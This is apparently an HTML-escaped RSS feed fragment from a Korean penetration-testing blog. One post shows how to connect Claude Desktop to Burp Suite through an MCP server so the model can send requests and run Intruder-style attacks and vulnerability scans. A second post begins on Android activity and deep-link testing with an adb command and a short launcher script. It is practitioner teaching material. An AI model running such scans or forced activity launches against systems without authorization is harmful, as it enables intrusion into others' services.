&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;물론 LLM 서비스에 의존하다 보면 지속적으로 LLM 만 사용하게 될 수도 있지만 본인이 미쳐 확인하지 못한 구간이나 특정 취약점에 대한 포인트를 찾게 되는 경우 굉장히 편리하게 사용할 수 있다.&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;하지만 Claude 자체가 Burpsuite 내 모든 기록에 대한 접근 및 기능을 사용할 수 있어서 편리하게 사용할 수 있으나 다음과 문제가 존재하는 것은 당연하니 완벽하게 취약점 분석할 때 감안하고 사용해야 한다.&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;Claude Default 및 Claude Pro 멤버쉽의 경우 어느 정도 사용 용량이 정해져있어 답변 도중 사용이 끝날 수 있다.&lt;/li&gt;
&lt;li&gt;Claude Default 및 Claude Pro 멤버쉽은 특정 프롬프트의 내용이 굉장히 많을 경우, 새로운 프롬프트를 생성하여 다시 사용해야 한다.&lt;/li&gt;
&lt;li&gt;Claude Default 및 Claude Pro 특성상 불러올 수 있는 데이터의 크기가 제한적이라 Burpsuite 내 모든 내용을 참고하거나 불러올 수 없으므로 명확하고 세부적으로 Burpsutie 내 내용을 호출해야한다.&lt;br /&gt;(예시 - Burpsutie #23 번 항목인 kaiht.kr 내&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #dddddd; color: #ee2323;&quot;&gt;&lt;b&gt;/server/service?test=xss&lt;/b&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;항목에 대해 분석해줘. SSRF 취약점이 의심되고 있어.)&lt;/li&gt;
&lt;li&gt;모든 LLM이 마찬가지이지만 해당 기능 자체가 Claude 서버와 연동되고 있으므로 보안상 노출되지 않는 범위까지 데이터가 입력되거나 노출될 수 있다. 따라서 기능 이용 후 해당 프롬프트를 삭제하거나 허가 받아 사용 되어야한다.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-style=&quot;style8&quot; data-ke-type=&quot;horizontalRule&quot; /&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;참고:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;a style=&quot;color: #0070d1;&quot; href=&quot;https://hacklido.com/blog/1051-burp-suite-claude-ai-connect-using-mcp-server-2025-setup#1-Referenc&quot;&gt;Burp Suite + Claude AI: Connect Using MCP Server (2025 Setup)&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1751259448130&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Burp Suite + Claude AI: Connect Using MCP Server (2025 Setup)&quot; data-og-description=&quot;If you&amp;rsquo;re looking to enhance your Burp Suite workflow with the help of AI and if you don&amp;rsquo;t have burp pro but want something cool and dope with burp sui...&quot; data-og-host=&quot;hacklido.com&quot; data-og-source-url=&quot;https://hacklido.com/blog/1051-burp-suite-claude-ai-connect-using-mcp-server-2025-setup#1-Referenc&quot; data-og-url=&quot;https://hacklido.com/d/1051-burp-suite-claude-ai-connect-using-mcp-server-2025-setup&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/b3npUb/hyZbp1kYx5/nnh8a1pmsqr9w3wpmvTt8k/img.jpg?width=1600&amp;amp;height=900&amp;amp;face=0_0_1600_900,https://scrap.kakaocdn.net/dn/ScNvN/hyZf2i2P7g/k0IW8zfjfLIgei5JY6sQc0/img.jpg?width=1600&amp;amp;height=900&amp;amp;face=0_0_1600_900&quot;&gt;&lt;a href=&quot;https://hacklido.com/blog/1051-burp-suite-claude-ai-connect-using-mcp-server-2025-setup#1-Referenc&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://hacklido.com/blog/1051-burp-suite-claude-ai-connect-using-mcp-server-2025-setup#1-Referenc&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/b3npUb/hyZbp1kYx5/nnh8a1pmsqr9w3wpmvTt8k/img.jpg?width=1600&amp;amp;height=900&amp;amp;face=0_0_1600_900,https://scrap.kakaocdn.net/dn/ScNvN/hyZf2i2P7g/k0IW8zfjfLIgei5JY6sQc0/img.jpg?width=1600&amp;amp;height=900&amp;amp;face=0_0_1600_900');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Burp Suite + Claude AI: Connect Using MCP Server (2025 Setup)&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;If you&amp;rsquo;re looking to enhance your Burp Suite workflow with the help of AI and if you don&amp;rsquo;t have burp pro but want something cool and dope with burp sui...&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;hacklido.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;본 기능을 위해선 다음과 같은 설정이 요구된다.&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;Burpsuite 내 MCP Server Extended&lt;/li&gt;
&lt;li&gt;Burpsuite 에서 지원하는 확장 기능이 요구된다. 해당 MCP 서버를 이용하여 Claude 와 Burpsuite 를 연결한다. (127.0.0.1:9876)&lt;/li&gt;
&lt;li&gt;당연히 Claude 를 이용하여 Burpsuite 를 이용하는 것이므로 Claude 설치가 요구된다.&lt;/li&gt;
&lt;/ol&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;Windows 내 설치:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;b&gt;winget install Anthropic.Claude --source winget&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;우선 Claude Desktop 을 설치해주자. 설치 이후 프로그램 사용을 위해서 구글 로그인이든 신규 가입 이후 로그인이든 계정이 요구되니 로그인을 수행해주자.&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;프로그램 설치:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;a style=&quot;color: #0070d1;&quot; href=&quot;https://claude.ai/download&quot;&gt;Download Claude&lt;/a&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;프로그램 설치 이후, Burpsuite 에 접근해서&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;Extentions&lt;/b&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;탭에서&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;MCP Server&lt;/b&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;을 검색해서 추가시켜준다.&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 만에하나 검색이 되지 않는 경우 다음 링크를 확인하여 수동 확장시켜준다.&lt;/p&gt;
&lt;figure id=&quot;og_1751259469926&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;GitHub - PortSwigger/mcp-server: MCP Server for Burp&quot; data-og-description=&quot;MCP Server for Burp. Contribute to PortSwigger/mcp-server development by creating an account on GitHub.&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/portswigger/mcp-server&quot; data-og-url=&quot;https://github.com/PortSwigger/mcp-server&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/jeFt0/hyZfZs5pcD/BHEGYr7eRFvCFt46OnPZZk/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/8DkA0/hyZbtby7BE/H4SLvfPdfOt5DN0OLBa5XK/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600&quot;&gt;&lt;a href=&quot;https://github.com/portswigger/mcp-server&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/portswigger/mcp-server&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/jeFt0/hyZfZs5pcD/BHEGYr7eRFvCFt46OnPZZk/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/8DkA0/hyZbtby7BE/H4SLvfPdfOt5DN0OLBa5XK/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;GitHub - PortSwigger/mcp-server: MCP Server for Burp&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;MCP Server for Burp. Contribute to PortSwigger/mcp-server development by creating an account on GitHub.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1157&quot; data-origin-height=&quot;813&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bemMT1/btsOVIDAZrz/ycQwUCZTTQPsiD3SNWxrpK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bemMT1/btsOVIDAZrz/ycQwUCZTTQPsiD3SNWxrpK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bemMT1/btsOVIDAZrz/ycQwUCZTTQPsiD3SNWxrpK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbemMT1%2FbtsOVIDAZrz%2FycQwUCZTTQPsiD3SNWxrpK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1157&quot; height=&quot;813&quot; data-origin-width=&quot;1157&quot; data-origin-height=&quot;813&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;해당 앱을 설치하면 다음과 같은 화면 확인이 가능하다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1157&quot; data-origin-height=&quot;813&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mHw5k/btsOWgUsHUO/rGWPFec0jJAU7anYcHZoVk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mHw5k/btsOWgUsHUO/rGWPFec0jJAU7anYcHZoVk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mHw5k/btsOWgUsHUO/rGWPFec0jJAU7anYcHZoVk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmHw5k%2FbtsOWgUsHUO%2FrGWPFec0jJAU7anYcHZoVk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1157&quot; height=&quot;813&quot; data-origin-width=&quot;1157&quot; data-origin-height=&quot;813&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;955&quot; data-origin-height=&quot;893&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/yGgfm/btsOXGrwDz6/lig69Ksm3T8AdGvsRlAxBK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/yGgfm/btsOXGrwDz6/lig69Ksm3T8AdGvsRlAxBK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/yGgfm/btsOXGrwDz6/lig69Ksm3T8AdGvsRlAxBK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FyGgfm%2FbtsOXGrwDz6%2Flig69Ksm3T8AdGvsRlAxBK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;955&quot; height=&quot;893&quot; data-origin-width=&quot;955&quot; data-origin-height=&quot;893&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;이후 우측 하단을 확인해보면&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #ee2323; background-color: #dddddd;&quot;&gt;&lt;b&gt;Install to Claude Desktop&lt;/b&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;이라는 기능이 존재하는데, 해당 기능을 클릭한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;955&quot; data-origin-height=&quot;893&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdmIh7/btsOYNXvewf/lqDmrnTw07O8MyoLU0DWk1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdmIh7/btsOYNXvewf/lqDmrnTw07O8MyoLU0DWk1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdmIh7/btsOYNXvewf/lqDmrnTw07O8MyoLU0DWk1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbdmIh7%2FbtsOYNXvewf%2FlqDmrnTw07O8MyoLU0DWk1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;955&quot; height=&quot;893&quot; data-origin-width=&quot;955&quot; data-origin-height=&quot;893&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;해당 기능을 활성화하면 진짜 설치할거냐 라고 물어보는데 YES, OK 해서 다음 스텝으로 넘어가주자.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;940&quot; data-origin-height=&quot;165&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/rN1wq/btsOWDWuSdg/xb0tFq3cbX2xTaZpIHTivK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/rN1wq/btsOWDWuSdg/xb0tFq3cbX2xTaZpIHTivK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/rN1wq/btsOWDWuSdg/xb0tFq3cbX2xTaZpIHTivK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FrN1wq%2FbtsOWDWuSdg%2Fxb0tFq3cbX2xTaZpIHTivK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;940&quot; height=&quot;165&quot; data-origin-width=&quot;940&quot; data-origin-height=&quot;165&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;591&quot; data-origin-height=&quot;219&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/F6rF6/btsOYgsk1zk/vcTcHSIwWUsC1sntHyaCs0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/F6rF6/btsOYgsk1zk/vcTcHSIwWUsC1sntHyaCs0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/F6rF6/btsOYgsk1zk/vcTcHSIwWUsC1sntHyaCs0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FF6rF6%2FbtsOYgsk1zk%2FvcTcHSIwWUsC1sntHyaCs0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;591&quot; height=&quot;219&quot; data-origin-width=&quot;591&quot; data-origin-height=&quot;219&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;이후 알림창에서 나온대로 재시작이 필요하다.&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;Claude Desktop 재시작 이후 화면을 확인해보면 프롬프트 설정에서 다음 burp 옵션이 활성화되어 추가된 것을 확인할 수 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;768&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/4xVSt/btsOW8B0O4H/XWKKafLKd6ciNhQBEF4JP0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/4xVSt/btsOW8B0O4H/XWKKafLKd6ciNhQBEF4JP0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/4xVSt/btsOW8B0O4H/XWKKafLKd6ciNhQBEF4JP0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F4xVSt%2FbtsOW8B0O4H%2FXWKKafLKd6ciNhQBEF4JP0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1024&quot; height=&quot;768&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;768&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;768&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/1p3JG/btsOXkhWOCO/eoOpMFUwXY8iE5Kx5lztV0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/1p3JG/btsOXkhWOCO/eoOpMFUwXY8iE5Kx5lztV0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/1p3JG/btsOXkhWOCO/eoOpMFUwXY8iE5Kx5lztV0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F1p3JG%2FbtsOXkhWOCO%2FeoOpMFUwXY8iE5Kx5lztV0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1024&quot; height=&quot;768&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;768&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;해당 메뉴를 확인해보면 web socket 에 접근할 것인지, http 요청하는 것을 claude 에서 수행할 것인지 등등 많은 옵션이 존재하는데, 해당 옵션을 이용하여 Claude 로 생성된 요청이나 encode 및 decode, 그리고 Introducer 공격도 가능하다.&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;연동한 상태에서 LLM 사용 시, 다음과 같은 권한 확인 창이 출력되는데, 이때 허용을 해주면 된다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;768&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/NvA66/btsOYFrSJfC/2oSlGKdVwd1eGlUpKKVlek/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/NvA66/btsOYFrSJfC/2oSlGKdVwd1eGlUpKKVlek/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/NvA66/btsOYFrSJfC/2oSlGKdVwd1eGlUpKKVlek/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNvA66%2FbtsOYFrSJfC%2F2oSlGKdVwd1eGlUpKKVlek%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1024&quot; height=&quot;768&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;768&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;허용을 해주면 다음과 같은 결과를 얻을 수 있다.&lt;br /&gt;(질문 내용: [Burpsuite 내 Scope 대상 등록 후] Scope 대상에 대한 웹 취약점 진단을 시작해줘.)&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;768&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bXPyd4/btsOWpjta98/B57N5H4UhMQ9iylEsVMcL0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bXPyd4/btsOWpjta98/B57N5H4UhMQ9iylEsVMcL0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bXPyd4/btsOWpjta98/B57N5H4UhMQ9iylEsVMcL0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbXPyd4%2FbtsOWpjta98%2FB57N5H4UhMQ9iylEsVMcL0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1024&quot; height=&quot;768&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;768&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>Tools/Burpsuite</category>
      <category>burpsuite</category>
      <category>burpsuite claude</category>
      <category>burpsuite llm</category>
      <category>burpsuite llm 연동</category>
      <category>claude burpsuite 연동</category>
      <category>claude 로 burpsuite 연결하기</category>
      <category>llm을 이용한 burpsuite 활용</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/79</guid>
      <comments>https://kaisec.tistory.com/entry/Analyzing-from-Burpsuite-to-Claude#entry79comment</comments>
      <pubDate>Mon, 30 Jun 2025 13:44:14 +0900</pubDate>
    </item>
    <item>
      <title>Run DeepLink Pentesting Android</title>
      <link>https://kaisec.tistory.com/entry/Run-DeepLink-Pentesting-Android</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;512&quot; data-origin-height=&quot;288&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/WYm1N/btsOmv4uHhV/YfZU4sRpwwHBxZbFzuXFEK/img.gif&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/WYm1N/btsOmv4uHhV/YfZU4sRpwwHBxZbFzuXFEK/img.gif&quot; data-alt=&quot;https://www.android.com/&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/WYm1N/btsOmv4uHhV/YfZU4sRpwwHBxZbFzuXFEK/img.gif&quot; srcset=&quot;https://blog.kakaocdn.net/dn/WYm1N/btsOmv4uHhV/YfZU4sRpwwHBxZbFzuXFEK/img.gif&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;860&quot; height=&quot;484&quot; data-origin-width=&quot;512&quot; data-origin-height=&quot;288&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://www.android.com/&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;모의해킹 실무에서 사용하던 취약점 중 하나가 'Activity 강제 실행' 을 이용한 취약점이 존재한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 취약점은 앱 내 존재하는 Activity 중 실행 가능한 Activity 를 임의 실행하여, 서비스 권한을 얻거나 특정 구간을 우회하는 것에서 사용한다.&lt;/p&gt;
&lt;pre id=&quot;code_1749393376968&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;adb shell am start -n $package/$actName&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 명령을 디바이스가 연결된 PC 터미널에서 입력하여 실행시킬 수 있으며, 해당 명령을 이용하여 bash 파일로 작성하는 경우 다음과 같이 작성할 수 있다.&lt;/p&gt;
&lt;pre id=&quot;code_1749393432773&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;#!/bin/bash
echo &quot;-----------------------------------&quot;
echo &quot;[+] Activate Application's Activity&quot;
echo &quot;[+] Starting App's Activity&quot;
echo &quot;[*] Input PackageName to Run: &quot;
read package
echo &quot;[+] Writing PackageName is $package from user&quot;
echo .
echo &quot;[*] Input Activity Name to Run: &quot;
read actName
echo .
am start -n $package/$actName
echo &quot;-----------------------------------&quot;&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;단순하게 안드로이드 어플리케이션 내 존재하는 Activity 만 실행하여 검증하는 것이 목표라면 해당 코드로 충분히 취약점 체크가 가능하나, 현재 확인하려는 것은 딥링크나 Intent 실행 검증이다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;Activity 실행 우회 취약점, Intent Injection 취약점, 그리고 딥링크 검증 미흡 이 3개의 취약점에 대한 공통점이 존재한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 컴포넌트 간 통신 취약점&lt;br /&gt;- Activity와 서비스, 그리고 브로드케스트 리시버 (Receiver) 간 Intent 통신 메커니즘이 사용됨.&lt;br /&gt;- Android 시스템의 암기적/명시적 Intent 처리 방식과 연관됨.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 우회 공격 가능성&lt;br /&gt;- 권한 없는 기능 실행이 가능&lt;br /&gt;- CWE-940 (Improper Verification of Intent by Broadcast Receiver) 관련&lt;/p&gt;
